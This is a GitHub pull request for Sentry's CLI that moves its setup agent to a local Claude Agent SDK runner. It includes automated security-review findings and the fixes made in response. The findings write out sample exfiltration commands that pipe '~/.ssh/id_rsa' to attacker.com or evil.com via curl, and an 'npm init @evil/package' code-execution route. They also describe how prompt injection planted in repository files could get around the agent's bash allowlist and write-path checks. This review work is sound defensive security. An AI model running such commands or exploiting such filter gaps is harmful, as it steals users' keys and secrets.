feat(init): run the setup agent locally via the Claude Agent SDK by betegon · Pull Request #1143 · getsentry/cli

betegon · 2026-06-26T08:05:13Z

Summary

Replaces the remote Mastra workflow (suspend/resume over the network) with a
local coding agent powered by @anthropic-ai/claude-agent-sdk. The agent
inspects the project, fetches Sentry docs on demand, installs the SDK, and
applies changes locally. We keep all the pre-agent work (preflight, org/project
resolution, project creation, feature selection, UI) and drop the suspend/resume
protocol and @mastra/client-js.

Inspired by PostHog's wizard, which runs the same SDK locally.

Changes

New local agent runner (src/lib/init/agent/): drives query(), gates tools via canUseTool (.env block + bash allowlist), isolates from the user's Claude settings (settingSources: []).
Model traffic routes through the Sentry init gateway -> Vercel AI Gateway (ANTHROPIC_BASE_URL). SENTRY_INIT_ANTHROPIC_API_KEY is a BYO-key/self-host/dev escape hatch straight to Anthropic.
Docs are local and iterative: get_docs_by_keywords walks docs.sentry.io/doctree.json and fetches .md pages — the agent calls it as often as it needs (src/lib/init/docs/). No remote docs service.
Deterministic Xcode/pbxproj transforms (sentry-cocoa SPM, React Native build phases) ship as in-process tools the agent invokes when it detects the platform (src/lib/init/agent/framework/).
wizard-runner rewritten to the local flow; removed init-service-auth and the old suspend/resume test.

Distribution / size

The SDK's JS is bundled at build time, but its per-platform native runtime is
not — the CLI stays fully bundled with zero runtime deps (check:no-deps). On
first init the native runtime is downloaded and cached under
~/.sentry/agent/<version>/<platform>/ (integrity-checked) and reused; running
from source uses the SDK's own binary and skips the download. So the shipped
artifacts barely grow; the heavy part is a one-time, per-machine, cached fetch.

Measured on darwin-arm64 (other platforms similar):

Artifact	Before (main)	After	Δ
Single binary (SEA)	101 MB	102 MB	+~1 MB
npm package, packed	2.5 MB	2.6 MB	+~0.1 MB
npm package, unpacked	9.3 MB	9.6 MB	+~0.3 MB
Bundle `dist/index.cjs`	4031 KB	4382 KB	+~351 KB
Agent runtime (native `claude`)	—	~62 MB download / ~210 MB on disk	not shipped; fetched once on first `init`, cached in `~/.sentry`

(For comparison, embedding the native runtime into the binary instead would take it to ~312 MB per platform, ~3x — which is why we download-and-cache.)

Test plan

pnpm typecheck, pnpm lint, pnpm check:deps, vitest run test/lib/init (376 + new agent/docs tests green).
Ran sentry init on 19 framework test projects (JS, Python, Cloudflare, native iOS, monorepos, large apps): 19/19 applied a working integration.
Runtime-verified data lands in Sentry: node-express (errors + traces) and flask (errors).
Verified from the compiled binary run outside any node_modules: first run downloads + caches the runtime (~/.sentry/agent/.../claude), subsequent runs reuse it.
Parity vs production (0.37.0 Mastra) on all 19: equivalent-or-better where prod succeeded; new also succeeded on 5 projects prod failed (monorepos it refused, a timeout, a prod bug); new is ~2-3x faster. New also declares the SDK in Python manifests where prod left it out.

Known gaps (follow-ups)

Monorepo app-selection isn't gated: the agent auto-picks an app instead of requiring --app like prod. Usually it picks well, but for strapi it chose the framework's own package. Needs the deferred app-listing + --app gating.
Package-manager detection is non-deterministic (one nextjs run used npm in a bun project). Worth pinning.

Depends on getsentry/cli-init-api #182 (the gateway) being deployed. Merge/deploy the gateway first.

Replace the remote Mastra workflow (suspend/resume over the network) with a local coding agent powered by @anthropic-ai/claude-agent-sdk. The agent inspects the project, fetches Sentry docs on demand, and applies changes locally, so we no longer maintain a server-side workflow or the suspend/resume protocol. - model traffic routes through the Sentry init gateway to the Vercel AI Gateway (ANTHROPIC_BASE_URL); a SENTRY_INIT_ANTHROPIC_API_KEY escape hatch allows BYO-key / self-host / dev runs straight to Anthropic - docs are served by a local, iterative get_docs_by_keywords tool that walks docs.sentry.io's doctree.json and fetches .md pages (no remote docs service) - deterministic Xcode/pbxproj transforms (sentry-cocoa SPM, React Native build phases) ship as in-process tools the agent calls when it detects the platform - drop @mastra/client-js and init-service-auth; readiness now checks the gateway Co-authored-by: Cursor <cursoragent@cursor.com>

Unit tests for the local-agent tool gate (.env block, bash allowlist, recursive-wizard guard) and the doctree lookup helpers (lib/feature path mapping, seed-page discovery, path normalization). Co-authored-by: Cursor <cursoragent@cursor.com>

github-actions · 2026-06-26T08:06:05Z

PR Preview Action v1.8.1
🚀 View preview at https://cli.sentry.dev/_preview/pr-1143/
Built to branch `gh-pages` at 2026-06-26 10:08 UTC. Preview will be ready when the GitHub Pages deployment is complete.

sentry-warden

Bash allowlist filter missing pipe and newline operators, enabling shell injection bypass

In src/lib/init/agent/permissions.ts, SHELL_OPERATOR_RE (/[;&\$()]/) omits |, >, <, and \n, so a prompt-injected command like npm run build | curl https://attacker.com -d @~/.ssh/id_rsa passes every guard (DANGEROUS_BASH_RE, SHELL_OPERATOR_RE, and the startsWith("npm run")prefix check) and executes as-is. Add|, >, <, and \n/\r` to the operator regex.

Evidence

SHELL_OPERATOR_RE = /[;&\$()]/inpermissions.tsline 21 does not include|, >, <`, or newline characters.
isAllowedBash('npm run build | curl https://evil.com -d @~/.ssh/id_rsa'): DANGEROUS_BASH_RE → false; SHELL_OPERATOR_RE.test(...) → false (no chars in [;&\$()]); startsWith('npm run')` → true → allowed.
Newline injection also bypasses: 'npm install x\ncurl https://evil.com' starts with 'npm install' and contains no blocked characters.
The Bash tool is enabled in non-dryRun mode (runner.ts buildAllowedTools), and the agent reads user-controlled project files, making prompt injection a viable attack path.
A malicious repository file (e.g., a README or config) could inject an instruction causing the agent to issue a piped exfiltration command that the filter accepts.

_{Identified by Warden security-review}

The CLI ships fully bundled with zero runtime dependencies (npm package and single binary alike), so the Claude Agent SDK's per-platform native runtime (~62 MB download, ~210 MB on disk) can't ride along in node_modules. Download it on first `init` and cache it under ~/.sentry/agent/<version>/<platform>, then point the SDK at it via pathToClaudeCodeExecutable. Subsequent runs reuse the cache; running from source (node_modules present) uses the SDK's own binary and skips the download. Keeps @anthropic-ai/claude-agent-sdk and xcode as bundled devDependencies so the published package stays dependency-free (check:no-deps). Co-authored-by: Cursor <cursoragent@cursor.com>

Address PR review findings: - Enable the Claude Agent SDK OS sandbox (filesystem allowWrite + network allowedDomains, failIfUnavailable:false) as the primary containment, mirroring PostHog's wizard. This restricts the agent's writes to the project + package caches and its egress to package registries, the model gateway, GitHub, and docs.sentry.io - blocking exfiltration via piped shell commands. - Block | < > and newlines in the bash allowlist as the fallback gate for hosts where the OS sandbox is unavailable. - Use the realpath-based safePath() for the in-process Xcode tools (which write outside the sandbox) so symlinked paths can't escape the project root. - Parse the URL pathname in normalizeDocPath instead of a startsWith(host) substring check (clears the CodeQL alert; behavior unchanged). Co-authored-by: Cursor <cursoragent@cursor.com>

…turns Per the Claude Agent SDK hosting guide: - Point CLAUDE_CONFIG_DIR at our scratch dir and set CLAUDE_CODE_DISABLE_AUTO_MEMORY=1 so the spawned CLI doesn't read or write the user's ~/.claude (transcripts, global config) and doesn't auto-load their CLAUDE.md memory, which loads regardless of settingSources and is a prompt-injection vector. - Set maxTurns (the SDK has no built-in wall-clock timeout) to bound a runaway session. Co-authored-by: Cursor <cursoragent@cursor.com>

sentry-warden

"npm i" prefix allows npm init <package> to execute arbitrary code

The "npm i" entry in SAFE_BASH_PREFIXES is matched with String.prototype.startsWith, so npm init @evil/package passes every check (DANGEROUS_BASH_RE misses it, SHELL_OPERATOR_RE misses it, and "npm init …".startsWith("npm i") is true). npm init <package> downloads and immediately runs the package's create script, giving an adversarial LLM output or a prompt-injection a path to arbitrary code execution. Fix by adding a trailing space: change "npm i" to "npm i " (and likewise audit "npm install" → "npm install ", etc.).

Evidence

permissions.ts line 27: "npm i" is the entry in SAFE_BASH_PREFIXES.
isAllowedBash (line 101) uses normalized.startsWith(prefix), so "npm init @evil/pkg" satisfies the prefix for "npm i".
DANGEROUS_BASH_RE matches only rm -rf, git reset, etc. — npm init is not listed.
SHELL_OPERATOR_RE matches [;&|<>\$()\n\r]—npm init @evil/pkg` contains none.
npm init <pkg> fetches and executes the package's initializer script (create-<pkg> on npm), i.e., arbitrary remote code execution.

canUseTool Write/Edit handler allows writes to any path outside the project root

In src/lib/init/agent/permissions.ts, canUseInitAgentTool for Write/Edit only blocks .env file patterns but imposes no project-root restriction. On Linux hosts where the OS sandbox is unavailable (failIfUnavailable: false), a prompt-injected agent can write to any user-writable path (e.g. ~/.bashrc, ~/.ssh/config). The sandbox is described as the primary containment with canUseTool as belt-and-suspenders, but the belt-and-suspenders doesn't cover path scope for Write/Edit.

Evidence

sandbox.ts sets failIfUnavailable: false, explicitly allowing graceful degradation on Linux without bubblewrap.
sandbox.ts comment: "This is the primary defense … canUseTool and safePath are belt-and-suspenders."
permissions.ts canUseInitAgentTool for 'Write' and 'Edit': checks isEnvPath(inputPath(input)) only; no check that the path is under workingDirectory.
runner.ts line ~231: canUseTool callback calls canUseInitAgentTool(toolName, input) but does not pass workingDirectory into it, so the permission function has no project-root context to enforce.
By contrast, the MCP tools (applyIosSpmTool, patchRnXcodeTool) properly use safePath(workingDirectory, relativePath) to enforce project root—same guard is absent for the built-in Write/Edit tools.

_{Identified by Warden find-bugs}

…ecksum Address follow-up review findings: - Block .envrc (direnv) in the Read/Write/Edit and Grep env-file guard, not just .env / .env.*. - Make the Grep guard glob-aware so patterns like **/.env* or *.env can't surface env-file contents (the previous literal-path check missed them). - Refuse to execute the downloaded agent runtime unless it verifies against the registry's sha512 integrity (falling back to the sha1 shasum), instead of silently skipping verification when integrity was absent. Co-authored-by: Cursor <cursoragent@cursor.com>

betegon · 2026-06-26T11:00:19Z

Triaged the latest review findings:

.envrc not blocked and Grep glob/include .env bypass (permissions.ts) — fixed in dad734c: the env-file guard now also blocks .envrc (direnv) and is glob-aware, so **/.env* / *.env patterns are denied too. Added tests.
Missing integrity skips runtime verification (runtime.ts) — fixed in dad734c: we now refuse to execute the downloaded agent runtime unless it verifies against the registry's sha512 integrity (falling back to the sha1 shasum), instead of silently skipping when integrity was absent.
Sentry token in the agent subprocess env (reachable by install lifecycle scripts) — accepted with mitigation. The token must live in the subprocess env for the SDK to authenticate model calls to the gateway; there is no out-of-band channel (this is the same pattern Claude Code and PostHog's wizard use). Exfiltration is constrained by the OS sandbox's network.allowedDomains egress allowlist, and the subprocess is isolated from the user's ~/.claude via CLAUDE_CONFIG_DIR + CLAUDE_CODE_DISABLE_AUTO_MEMORY. Residual risk acknowledged.

Resolving these threads.

betegon and others added 2 commits June 26, 2026 10:03

github-advanced-security AI found potential problems Jun 26, 2026

View reviewed changes

Comment thread src/lib/init/docs/fetcher.ts Fixed